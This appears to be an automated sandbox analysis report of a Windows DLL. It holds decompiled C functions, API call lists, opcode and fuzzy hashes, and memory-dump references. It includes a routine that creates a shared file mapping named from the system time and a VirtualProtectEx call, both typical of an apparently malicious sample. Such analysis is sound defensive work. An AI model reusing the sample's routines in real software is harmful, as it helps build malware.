                                                                                                                                                                                                                                                          • Opcode ID: c4eff99be9e623b0dfac6647211ac520c38b53184d3b917477a5fc777b4bf76f
                                                                                                                                                                                                                                                          • Instruction ID: 951afd216082edf69e3484bdea4701d603ac72dad9fdee8c97cbd943b8fd507c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4eff99be9e623b0dfac6647211ac520c38b53184d3b917477a5fc777b4bf76f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 463154B1E4021ADFDF01EF99D980BDEB7B5FF49304F158169E904AB241D771AA068F90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                                                          			E6DDF1D32(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                          				long _t3;
                                                                                                                                                                                                                                                          				int _t4;
                                                                                                                                                                                                                                                          				int _t9;
                                                                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t13 = GetCurrentThread();
                                                                                                                                                                                                                                                          				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                                                                                                                                          				if(_t3 != 0) {
                                                                                                                                                                                                                                                          					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				_t4 = E6DDF17A7(_a4); // executed
                                                                                                                                                                                                                                                          				_t9 = _t4;
                                                                                                                                                                                                                                                          				if(_t9 == 0) {
                                                                                                                                                                                                                                                          					SetThreadPriority(_t13, _t4);
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                          				return _t9;
                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                          0x6ddf1d3b
                                                                                                                                                                                                                                                          0x6ddf1d40
                                                                                                                                                                                                                                                          0x6ddf1d4e
                                                                                                                                                                                                                                                          0x6ddf1d53
                                                                                                                                                                                                                                                          0x6ddf1d53
                                                                                                                                                                                                                                                          0x6ddf1d59
                                                                                                                                                                                                                                                          0x6ddf1d5e
                                                                                                                                                                                                                                                          0x6ddf1d62
                                                                                                                                                                                                                                                          0x6ddf1d66
                                                                                                                                                                                                                                                          0x6ddf1d66
                                                                                                                                                                                                                                                          0x6ddf1d70
                                                                                                                                                                                                                                                          0x6ddf1d79

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 6DDF1D35
                                                                                                                                                                                                                                                          • SetThreadAffinityMask.KERNEL32 ref: 6DDF1D40
                                                                                                                                                                                                                                                          • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 6DDF1D53
                                                                                                                                                                                                                                                          • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6DDF1D66
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481707727.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481697233.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481717024.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481730026.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481741873.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1452675757-0
                                                                                                                                                                                                                                                          • Opcode ID: dba9c001ebc22cc53e572c16e9509fbdc5b77db99f259e01cff94314948529ec
                                                                                                                                                                                                                                                          • Instruction ID: f67ca2c437cc9d25b0832fbaab3075d06012799495d37e9fa8532987814b0537
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dba9c001ebc22cc53e572c16e9509fbdc5b77db99f259e01cff94314948529ec
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EE092713453116BE7023F295C88F6B6B6CDF923357030336F624D22D0DB548C0A89A6
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 6DE41D07
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6DE41D75
                                                                                                                                                                                                                                                            • Part of subcall function 6DE41C1A: WideCharToMultiByte.KERNEL32(?,00000000,6DE3F667,00000000,00000001,6DE3F5F6,6DE43EDB,?,6DE3F667,?,00000000,?,6DE43C4A,0000FDE9,00000000,?), ref: 6DE41CBC
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D6C4: RtlAllocateHeap.NTDLL(00000000,00000001,6DE70094), ref: 6DE3D6F6
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE41D66
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2560199156-0
                                                                                                                                                                                                                                                          • Opcode ID: f419980b0d57dab263cfb1bb07152273dce8c3778cd03d5837c90342662bd574
                                                                                                                                                                                                                                                          • Instruction ID: 5ba21e5573019dbdedcb8a1564be68c68804b1a21aee047c8901b2fafa0fa3d0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f419980b0d57dab263cfb1bb07152273dce8c3778cd03d5837c90342662bd574
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4101ACE2E056557BAF2555F62E88D7F296DDEC3DD9326412CFA18E2240EF50CC1281B0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualProtectEx.KERNEL32(000000FF,?,00000040,?), ref: 6DE335B3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                                          • Opcode ID: 2a078a42a687d0d38597212de1fb6c51f92280019bb8d77228cd409bea1cf183
                                                                                                                                                                                                                                                          • Instruction ID: 1115afd1a7ed923e406f6e647771b745372071fa741e67ba74b00846fb492e03
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a078a42a687d0d38597212de1fb6c51f92280019bb8d77228cd409bea1cf183
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F7122719002748FCB54CF2EC490BB97BF6FB47220F25866AE494D7381D7399609DB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DE40978: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6DE409B9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42FBC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                                                                                                          • Opcode ID: b7804acc5ac8e76e4e277d302aae37f77a1a99be9d03590c493c00d748cf0a8c
                                                                                                                                                                                                                                                          • Instruction ID: da0b4d0f3ed5bc1f87e932daf56c05df0494675c833e116fcacd40ee9987ed17
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7804acc5ac8e76e4e277d302aae37f77a1a99be9d03590c493c00d748cf0a8c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA014E726043169BC3318F58D88099AFB98FF553B4F61462DE955F76C0DB705910C7A4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6DE409B9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: e43f7b01dcb2410d4e0cc150c082f31e1611fb396fa6e5deed64c7cdaf00cbaa
                                                                                                                                                                                                                                                          • Instruction ID: 8f3cdb6fc238f1dcb111a644db3b11c1714873b558ea6b24662a11a3468a7414
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e43f7b01dcb2410d4e0cc150c082f31e1611fb396fa6e5deed64c7cdaf00cbaa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0B43164963567FB529A27AC04B6A3768AFE6774B32C035AB2CF6280CF20D44182A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000001,6DE70094), ref: 6DE3D6F6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: ab57e7ab1071731321be4f92eefcb7bc2d25b8478c66e19dfe56a8bd015a8c60
                                                                                                                                                                                                                                                          • Instruction ID: 9b203a202315def1d33e9704a9455b78d199e4f037fb1c0bb62c660e1ccade68
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab57e7ab1071731321be4f92eefcb7bc2d25b8478c66e19dfe56a8bd015a8c60
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4E0E52A24423A67EB1116668D01B7B769CEFC27A8F734150DD39B22C0CF20C843C6B1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 6DE4297E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE456CE
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE456E0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE456F2
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45704
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45716
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45728
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE4573A
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE4574C
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE4575E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45770
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45782
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45794
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE457A6
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42973
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42995
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429AA
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429B5
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429D7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429EA
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429F8
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A03
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A3B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A42
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A5F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A77
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                                          • Opcode ID: 5bc5d7dabc40d387ff5b54aff10c1e47f8e9c51b520f6bb14d3579fc390057cf
                                                                                                                                                                                                                                                          • Instruction ID: 62937f88dd65bbaf75270fac1dbc8802996cfce4dc97a32381c655e6db36b1e5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bc5d7dabc40d387ff5b54aff10c1e47f8e9c51b520f6bb14d3579fc390057cf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D315B31608602AEEB308A35E844B7A77E8BF50358F72852DE96DE6250DF31E860DB14
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6DE395CB
                                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 6DE395F2
                                                                                                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 6DE396FE
                                                                                                                                                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 6DE39753
                                                                                                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6DE397D9
                                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 6DE39860
                                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 6DE3987B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                          • API String ID: 4234981820-393685449
                                                                                                                                                                                                                                                          • Opcode ID: 84a5ec7c0079e7f92af8cc979752def55742a623ea7267c367ddf969d144cf9b
                                                                                                                                                                                                                                                          • Instruction ID: e1c052020db4e65fc723426a1066abd43358c49f38e40b9b481dbb45479a0978
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84a5ec7c0079e7f92af8cc979752def55742a623ea7267c367ddf969d144cf9b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C14971C0822AABCF15CFA4CC809BEBBB5AF48318F224159E9157B241DF35D651CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D27E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D28A
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D295
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2A0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2AB
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2B6
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2C1
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2CC
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2D7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2E5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 45aec3eed34b1108637822851370a699a6a760e9032c57c6915747af7d4467eb
                                                                                                                                                                                                                                                          • Instruction ID: a0d095d940df9d4e950a5f75349bee08d61d88b10ae0e5b0bcd087542ff4b4a8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45aec3eed34b1108637822851370a699a6a760e9032c57c6915747af7d4467eb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D21A97A904118AFCF41DFA4C850DED7BB9FF48244B538169EA199B120DB31DA65CF80
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 65cf7fbdcd06f03837a7082aa3d7c7d33da49a6c5efcff7a354c6429826e1403
                                                                                                                                                                                                                                                          • Instruction ID: ae685c0174bfd2950cdb2dc524a756d7f9a646737ffe83045cf254a01b6ea53b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65cf7fbdcd06f03837a7082aa3d7c7d33da49a6c5efcff7a354c6429826e1403
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5C109B4E082159FDF11CF9AD880BBDBBB0BF9A318F61816DE515A7381CB349941CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6DE447C9
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE447D0
                                                                                                                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 6DE447DC
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6DE447E6
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE447EF
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6DE4480F
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(6DE3FCD2), ref: 6DE4495C
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6DE4498E
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE44995
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseHandle$FileType
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 906505306-0
                                                                                                                                                                                                                                                          • Opcode ID: 52ffa04f023c7060887ade4418f74b73ec9958e2baf6c746242a0de21802f3fb
                                                                                                                                                                                                                                                          • Instruction ID: 2d03bb72fbf572ff1a1c79094dc02d1e8b2983951785bf93707c50d92d684a8c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52ffa04f023c7060887ade4418f74b73ec9958e2baf6c746242a0de21802f3fb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DA13272A081598FCF09DF68E841BAD7BF0AB4F328F25815EE815AB390CF748812C751
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                          			E6DDF1979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                          				struct _FILETIME* _v16;
                                                                                                                                                                                                                                                          				short _v60;
                                                                                                                                                                                                                                                          				struct _FILETIME* _t14;
                                                                                                                                                                                                                                                          				intOrPtr _t15;
                                                                                                                                                                                                                                                          				long _t18;
                                                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                                          				long _t32;
                                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t31 = __edx;
                                                                                                                                                                                                                                                          				_t14 =  &_v16;
                                                                                                                                                                                                                                                          				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                                          				_push(0x192);
                                                                                                                                                                                                                                                          				_push(0x54d38000);
                                                                                                                                                                                                                                                          				_push(_v12);
                                                                                                                                                                                                                                                          				_push(_v16);
                                                                                                                                                                                                                                                          				L6DDF2210();
                                                                                                                                                                                                                                                          				_push(_t14);
                                                                                                                                                                                                                                                          				_v16 = _t14;
                                                                                                                                                                                                                                                          				_t15 =  *0x6ddf41d0;
                                                                                                                                                                                                                                                          				_push(_t15 + 0x6ddf505e);
                                                                                                                                                                                                                                                          				_push(_t15 + 0x6ddf5054);
                                                                                                                                                                                                                                                          				_push(0x16);
                                                                                                                                                                                                                                                          				_push( &_v60);
                                                                                                                                                                                                                                                          				_v12 = _t31;
                                                                                                                                                                                                                                                          				L6DDF220A();
                                                                                                                                                                                                                                                          				_t18 = _a4;
                                                                                                                                                                                                                                                          				if(_t18 == 0) {
                                                                                                                                                                                                                                                          					_t18 = 0x1000;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				_t34 = CreateFileMappingW(0xffffffff, 0x6ddf41c0, 4, 0, _t18,  &_v60);
                                                                                                                                                                                                                                                          				if(_t34 == 0) {
                                                                                                                                                                                                                                                          					_t32 = GetLastError();
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                          						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
                                                                                                                                                                                                                                                          						if(_t22 == 0) {
                                                                                                                                                                                                                                                          							_t32 = GetLastError();
                                                                                                                                                                                                                                                          							if(_t32 != 0) {
                                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                          							 *_a8 = _t34;
                                                                                                                                                                                                                                                          							 *_a12 = _t22;
                                                                                                                                                                                                                                                          							_t32 = 0;
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                          						_t32 = 2;
                                                                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                                                                          						CloseHandle(_t34);
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				return _t32;
                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                          0x6ddf1979
                                                                                                                                                                                                                                                          0x6ddf1982
                                                                                                                                                                                                                                                          0x6ddf1986
                                                                                                                                                                                                                                                          0x6ddf198c
                                                                                                                                                                                                                                                          0x6ddf1991
                                                                                                                                                                                                                                                          0x6ddf1996
                                                                                                                                                                                                                                                          0x6ddf1999
                                                                                                                                                                                                                                                          0x6ddf199c
                                                                                                                                                                                                                                                          0x6ddf19a1
                                                                                                                                                                                                                                                          0x6ddf19a2
                                                                                                                                                                                                                                                          0x6ddf19a5
                                                                                                                                                                                                                                                          0x6ddf19b0
                                                                                                                                                                                                                                                          0x6ddf19b7
                                                                                                                                                                                                                                                          0x6ddf19bb
                                                                                                                                                                                                                                                          0x6ddf19bd
                                                                                                                                                                                                                                                          0x6ddf19be
                                                                                                                                                                                                                                                          0x6ddf19c1
                                                                                                                                                                                                                                                          0x6ddf19c6
                                                                                                                                                                                                                                                          0x6ddf19d0
                                                                                                                                                                                                                                                          0x6ddf19d2
                                                                                                                                                                                                                                                          0x6ddf19d2
                                                                                                                                                                                                                                                          0x6ddf19ec
                                                                                                                                                                                                                                                          0x6ddf19f0
                                                                                                                                                                                                                                                          0x6ddf1a40
                                                                                                                                                                                                                                                          0x6ddf19f2
                                                                                                                                                                                                                                                          0x6ddf19fb
                                                                                                                                                                                                                                                          0x6ddf1a11
                                                                                                                                                                                                                                                          0x6ddf1a19
                                                                                                                                                                                                                                                          0x6ddf1a2b
                                                                                                                                                                                                                                                          0x6ddf1a2f
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1a1b
                                                                                                                                                                                                                                                          0x6ddf1a1e
                                                                                                                                                                                                                                                          0x6ddf1a23
                                                                                                                                                                                                                                                          0x6ddf1a25
                                                                                                                                                                                                                                                          0x6ddf1a25
                                                                                                                                                                                                                                                          0x6ddf1a06
                                                                                                                                                                                                                                                          0x6ddf1a08
                                                                                                                                                                                                                                                          0x6ddf1a31
                                                                                                                                                                                                                                                          0x6ddf1a32
                                                                                                                                                                                                                                                          0x6ddf1a32
                                                                                                                                                                                                                                                          0x6ddf19fb
                                                                                                                                                                                                                                                          0x6ddf1a48

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6DDF176E,0000000A,?,?), ref: 6DDF1986
                                                                                                                                                                                                                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6DDF199C
                                                                                                                                                                                                                                                          • _snwprintf.NTDLL ref: 6DDF19C1
                                                                                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(000000FF,6DDF41C0,00000004,00000000,?,?), ref: 6DDF19E6
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DDF176E,0000000A,?), ref: 6DDF19FD
                                                                                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6DDF1A11
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DDF176E,0000000A,?), ref: 6DDF1A29
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6DDF176E,0000000A), ref: 6DDF1A32
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DDF176E,0000000A,?), ref: 6DDF1A3A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481707727.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481697233.000000006DDF0000.00000002.00020000.sdmp Download File
